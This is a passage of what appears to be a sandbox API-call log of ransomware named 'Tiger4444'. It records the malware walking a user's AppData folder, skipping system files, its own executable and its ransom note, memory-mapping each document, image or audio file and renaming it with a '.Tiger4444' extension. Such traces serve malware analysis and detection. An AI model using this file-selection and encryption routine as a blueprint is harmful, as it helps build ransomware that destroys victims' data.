"c:\\users\\fd1hvy\\appdata\\roaming\\n yyki2ney_gz_-ze.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\n yYkI2ney_gz_-zE.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n yyki2ney_gz_-ze.jpg.tiger4444"), dwFlags=0x1) returned 1 [0050.044] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89672210, ftCreationTime.dwHighDateTime=0x1d4c65e, ftLastAccessTime.dwLowDateTime=0x3ceabeb0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x3ceabeb0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x112b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrEu8Gyj.bmp", cAlternateFileName="")) returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="Tiger4444.exe") returned -1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2=".") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="..") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="windows") returned -1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="bootmgr") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="pagefile.sys") returned -1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="boot") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="ids.txt") returned 1 [0050.044] lstrcmpiW (lpString1="NrEu8Gyj.bmp", lpString2="NTUSER.DAT") returned -1 [0050.044] lstrcpyW (in: lpString1=0x30aeae8, lpString2="NrEu8Gyj.bmp" | out: lpString1="NrEu8Gyj.bmp") returned="NrEu8Gyj.bmp" [0050.044] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NrEu8Gyj.bmp", dwFileAttributes=0x0) returned 1 [0050.044] lstrlenW (lpString="NrEu8Gyj.bmp") returned 12 [0050.044] lstrlenW (lpString="Tiger4444") returned 9 [0050.044] lstrcmpiW (lpString1="u8Gyj.bmp", lpString2="Tiger4444") returned 1 [0050.044] lstrlenW (lpString=".dll") returned 4 [0050.044] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.044] lstrlenW (lpString=".lnk") returned 4 [0050.044] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.044] lstrlenW (lpString=".ini") returned 4 [0050.044] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.045] lstrlenW (lpString=".sys") returned 4 [0050.045] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.045] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NrEu8Gyj.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nreu8gyj.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.045] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.045] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14149789846) returned 1 [0050.045] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70326) returned 1 [0050.045] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0050.045] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0050.045] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x115c0, lpName=0x0) returned 0x2c8 [0050.045] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x115c0) returned 0xbe0000 [0050.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0050.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.047] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14150018798) returned 1 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0050.047] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0050.047] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.048] CloseHandle (hObject=0x2c8) returned 1 [0050.048] CloseHandle (hObject=0x260) returned 1 [0050.049] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\NrEu8Gyj.bmp.Tiger4444") returned 54 [0050.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NrEu8Gyj.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nreu8gyj.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NrEu8Gyj.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nreu8gyj.bmp.tiger4444"), dwFlags=0x1) returned 1 [0050.050] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ed6920, ftCreationTime.dwHighDateTime=0x1d4c9b4, ftLastAccessTime.dwLowDateTime=0xe13f1300, ftLastAccessTime.dwHighDateTime=0x1d4c7f1, ftLastWriteTime.dwLowDateTime=0xe13f1300, ftLastWriteTime.dwHighDateTime=0x1d4c7f1, nFileSizeHigh=0x0, nFileSizeLow=0xdd41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O3kltfMNYirubdno.jpg", cAlternateFileName="O3KLTF~1.JPG")) returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="Tiger4444.exe") returned -1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2=".") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="..") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="windows") returned -1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="bootmgr") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="pagefile.sys") returned -1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="boot") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="ids.txt") returned 1 [0050.050] lstrcmpiW (lpString1="O3kltfMNYirubdno.jpg", lpString2="NTUSER.DAT") returned 1 [0050.050] lstrcpyW (in: lpString1=0x30aeae8, lpString2="O3kltfMNYirubdno.jpg" | out: lpString1="O3kltfMNYirubdno.jpg") returned="O3kltfMNYirubdno.jpg" [0050.050] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\O3kltfMNYirubdno.jpg", dwFileAttributes=0x0) returned 1 [0050.051] lstrlenW (lpString="O3kltfMNYirubdno.jpg") returned 20 [0050.051] lstrlenW (lpString="Tiger4444") returned 9 [0050.051] lstrcmpiW (lpString1="ubdno.jpg", lpString2="Tiger4444") returned 1 [0050.051] lstrlenW (lpString=".dll") returned 4 [0050.051] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.051] lstrlenW (lpString=".lnk") returned 4 [0050.051] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.051] lstrlenW (lpString=".ini") returned 4 [0050.051] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.051] lstrlenW (lpString=".sys") returned 4 [0050.051] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\O3kltfMNYirubdno.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\o3kltfmnyirubdno.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.051] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.051] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14150440171) returned 1 [0050.051] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=56641) returned 1 [0050.051] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0050.051] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0050.051] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe050, lpName=0x0) returned 0x2c8 [0050.052] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe050) returned 0xbe0000 [0050.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0050.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.054] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.054] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0050.054] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14150670349) returned 1 [0050.054] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0050.054] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0050.054] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.054] CloseHandle (hObject=0x2c8) returned 1 [0050.054] CloseHandle (hObject=0x260) returned 1 [0050.055] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\O3kltfMNYirubdno.jpg.Tiger4444") returned 62 [0050.055] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\O3kltfMNYirubdno.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\o3kltfmnyirubdno.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\O3kltfMNYirubdno.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\o3kltfmnyirubdno.jpg.tiger4444"), dwFlags=0x1) returned 1 [0050.056] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd6400, ftCreationTime.dwHighDateTime=0x1d4d1d2, ftLastAccessTime.dwLowDateTime=0xbb0cf1a0, ftLastAccessTime.dwHighDateTime=0x1d4cd5c, ftLastWriteTime.dwLowDateTime=0xbb0cf1a0, ftLastWriteTime.dwHighDateTime=0x1d4cd5c, nFileSizeHigh=0x0, nFileSizeLow=0x1134d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUtMYFGKvN.pptx", cAlternateFileName="OUTMYF~1.PPT")) returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="Tiger4444.exe") returned -1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2=".") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="..") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="windows") returned -1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="bootmgr") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="pagefile.sys") returned -1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="boot") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="ids.txt") returned 1 [0050.056] lstrcmpiW (lpString1="OUtMYFGKvN.pptx", lpString2="NTUSER.DAT") returned 1 [0050.056] lstrcpyW (in: lpString1=0x30aeae8, lpString2="OUtMYFGKvN.pptx" | out: lpString1="OUtMYFGKvN.pptx") returned="OUtMYFGKvN.pptx" [0050.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\OUtMYFGKvN.pptx", dwFileAttributes=0x0) returned 1 [0050.057] lstrlenW (lpString="OUtMYFGKvN.pptx") returned 15 [0050.057] lstrlenW (lpString="Tiger4444") returned 9 [0050.057] lstrcmpiW (lpString1="GKvN.pptx", lpString2="Tiger4444") returned -1 [0050.057] lstrlenW (lpString=".dll") returned 4 [0050.057] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0050.057] lstrlenW (lpString=".lnk") returned 4 [0050.057] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0050.057] lstrlenW (lpString=".ini") returned 4 [0050.057] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0050.057] lstrlenW (lpString=".sys") returned 4 [0050.057] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0050.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\OUtMYFGKvN.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\outmyfgkvn.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.057] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.057] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14151019683) returned 1 [0050.057] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70477) returned 1 [0050.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0050.057] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11650, lpName=0x0) returned 0x2c8 [0050.057] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11650) returned 0xbe0000 [0050.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0050.059] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.059] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.059] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.059] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0050.060] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14151264392) returned 1 [0050.060] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.060] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0050.060] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.060] CloseHandle (hObject=0x2c8) returned 1 [0050.060] CloseHandle (hObject=0x260) returned 1 [0050.061] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\OUtMYFGKvN.pptx.Tiger4444") returned 57 [0050.061] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\OUtMYFGKvN.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\outmyfgkvn.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\OUtMYFGKvN.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\outmyfgkvn.pptx.tiger4444"), dwFlags=0x1) returned 1 [0050.065] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x997b9f40, ftCreationTime.dwHighDateTime=0x1d4c858, ftLastAccessTime.dwLowDateTime=0xf8790290, ftLastAccessTime.dwHighDateTime=0x1d4c861, ftLastWriteTime.dwLowDateTime=0xf8790290, ftLastWriteTime.dwHighDateTime=0x1d4c861, nFileSizeHigh=0x0, nFileSizeLow=0x17bfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUFiGN K2uY.jpg", cAlternateFileName="PUFIGN~1.JPG")) returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="Tiger4444.exe") returned -1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2=".") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="..") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="windows") returned -1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="bootmgr") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="pagefile.sys") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="boot") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="ids.txt") returned 1 [0050.065] lstrcmpiW (lpString1="PUFiGN K2uY.jpg", lpString2="NTUSER.DAT") returned 1 [0050.065] lstrcpyW (in: lpString1=0x30aeae8, lpString2="PUFiGN K2uY.jpg" | out: lpString1="PUFiGN K2uY.jpg") returned="PUFiGN K2uY.jpg" [0050.065] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PUFiGN K2uY.jpg", dwFileAttributes=0x0) returned 1 [0050.065] lstrlenW (lpString="PUFiGN K2uY.jpg") returned 15 [0050.065] lstrlenW (lpString="Tiger4444") returned 9 [0050.065] lstrcmpiW (lpString1=" K2uY.jpg", lpString2="Tiger4444") returned -1 [0050.065] lstrlenW (lpString=".dll") returned 4 [0050.066] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.066] lstrlenW (lpString=".lnk") returned 4 [0050.066] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.066] lstrlenW (lpString=".ini") returned 4 [0050.066] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.066] lstrlenW (lpString=".sys") returned 4 [0050.066] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PUFiGN K2uY.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pufign k2uy.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.066] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.066] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14151905629) returned 1 [0050.066] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=97275) returned 1 [0050.066] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0050.066] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0050.066] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17f00, lpName=0x0) returned 0x2c8 [0050.066] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f00) returned 0xbe0000 [0050.069] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.069] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.069] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0050.069] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.069] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14152230687) returned 1 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0050.069] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0050.069] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.070] CloseHandle (hObject=0x2c8) returned 1 [0050.070] CloseHandle (hObject=0x260) returned 1 [0050.072] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PUFiGN K2uY.jpg.Tiger4444") returned 57 [0050.072] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PUFiGN K2uY.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pufign k2uy.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PUFiGN K2uY.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pufign k2uy.jpg.tiger4444"), dwFlags=0x1) returned 1 [0050.072] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81534720, ftCreationTime.dwHighDateTime=0x1d4cf32, ftLastAccessTime.dwLowDateTime=0xe8e6d8a0, ftLastAccessTime.dwHighDateTime=0x1d4d187, ftLastWriteTime.dwLowDateTime=0xe8e6d8a0, ftLastWriteTime.dwHighDateTime=0x1d4d187, nFileSizeHigh=0x0, nFileSizeLow=0x6a9a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p_O1lv1CEgWauiU.mp3", cAlternateFileName="P_O1LV~1.MP3")) returned 1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="Tiger4444.exe") returned -1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2=".") returned 1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="..") returned 1 [0050.072] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="windows") returned -1 [0050.073] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="bootmgr") returned 1 [0050.073] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="pagefile.sys") returned -1 [0050.073] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="boot") returned 1 [0050.073] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="ids.txt") returned 1 [0050.073] lstrcmpiW (lpString1="p_O1lv1CEgWauiU.mp3", lpString2="NTUSER.DAT") returned 1 [0050.073] lstrcpyW (in: lpString1=0x30aeae8, lpString2="p_O1lv1CEgWauiU.mp3" | out: lpString1="p_O1lv1CEgWauiU.mp3") returned="p_O1lv1CEgWauiU.mp3" [0050.073] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\p_O1lv1CEgWauiU.mp3", dwFileAttributes=0x0) returned 1 [0050.073] lstrlenW (lpString="p_O1lv1CEgWauiU.mp3") returned 19 [0050.073] lstrlenW (lpString="Tiger4444") returned 9 [0050.073] lstrcmpiW (lpString1="WauiU.mp3", lpString2="Tiger4444") returned 1 [0050.073] lstrlenW (lpString=".dll") returned 4 [0050.073] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.073] lstrlenW (lpString=".lnk") returned 4 [0050.073] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.073] lstrlenW (lpString=".ini") returned 4 [0050.073] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.073] lstrlenW (lpString=".sys") returned 4 [0050.073] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.073] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\p_O1lv1CEgWauiU.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p_o1lv1cegwauiu.mp3"), 